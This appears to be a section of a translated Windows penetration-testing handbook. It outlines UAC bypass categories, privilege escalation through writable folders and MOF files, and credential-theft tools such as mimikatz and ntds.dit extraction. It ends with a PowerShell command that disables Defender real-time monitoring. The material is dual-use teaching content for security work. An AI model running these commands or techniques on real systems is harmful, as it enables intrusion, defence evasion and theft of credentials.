6.1.3. Privilege

6.1.3.1. UAC

6.1.3.1.1. Introduction

UAC (User Account Control) is a security mechanism introduced by Windows Vista and Windows Server 2008. When some sensitive operations occur, a prompt will pop up to explicitly ask for system permissions.

When a user logs in to Windows, each user is granted an access token, which contains the security identifier (SID) information, which determines the user’s authority.

6.1.3.1.2. Actions that will trigger UAC

• Start the app with administrator privileges

• Modify system, UAC settings

• Modify files or directories without permissions（ %SystemRoot% / %ProgramFiles% 等 ）

• Modify ACL (access control list)

• install driver

• Add or delete accounts, modify account types, activate guest accounts

6.1.3.1.3. ByPass

• DLL related

• Process injection

• Registry

6.1.3.2. Privilege Escalation

There are multiple ways to escalate privileges, including exploiting binary loopholes and logic loopholes. The way to use binary vulnerabilities to gain privileges is to use vulnerabilities running in kernel mode to execute code. Such as UAF in the kernel, driver or other similar vulnerabilities to gain higher privileges.

Logic loopholes mainly use some logical problems in the system. For example, some folders can be written by users, but they will be started with administrator privileges.

6.1.3.2.1. Arbitrary write file utilization

The sensitive locations where users can write in Windows are mainly the following:

• The user’s own files and directories, including AppData and Temp

• C:\ ，by default the user can write

• subdirectories of C:\ProgramData ，users can create folders, write files by default

• subdirectories of C:\Windows\Temp ，users can create folders, write files by default

The specific ACL information can be viewed with AccessChk, or use PowerShell Get-Acl。

You can use the write permissions to these folders and their subdirectories to write some dlls that may be loaded, and use the dll loading execution to obtain permissions.

6.1.3.2.2. MOF

MOF is a the Windows system file（ c:/windows/system32/wbem/mof/nullevt.mof ）called “Managed Object Format”, and its role is to monitor process creation and death every five seconds.

When you have the permission to upload files but do not have a Shell, you can upload a customized mof file to the corresponding location, and the mof will be executed after a certain period of time.

Generally, a vbs script that adds a command to add an administrator user to the mof is used, and when executed, a new administrator account is obtained.

6.1.3.2.3. Credential theft

• Windows native password hash export tool

  • mimikatz

  • lsass

  • wce

  • gsecdump

  • copypwd

  • Pwdump

  • ProcDump

    • https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

• Windows native password cracking tool

  • L0phtCrack

  • SAMInside

  • Ophcrack

• Rainbow Table Hack

• Native hash + plaintext capture

• win8+win2012 plaintext capture

• Export of ntds.dit+QuarkPwDump read analysis

• vssown.vbs + libesedb + NtdsXtract

• ntdsdump

• Use powershell(DSInternals) analyze hash

• Use reset password attempts net use \\%computername% /u:%username%

• When reading is restricted, it can be read in the dump file of the blue screen after crashing the operating system

6.1.3.2.4. other

• Group Policy Preferences Vulnerability

• DLL Hijacking

• Replacing system tools and implementing backdoors

• close defender

  • Set-MpPreference -disablerealtimeMonitoring $true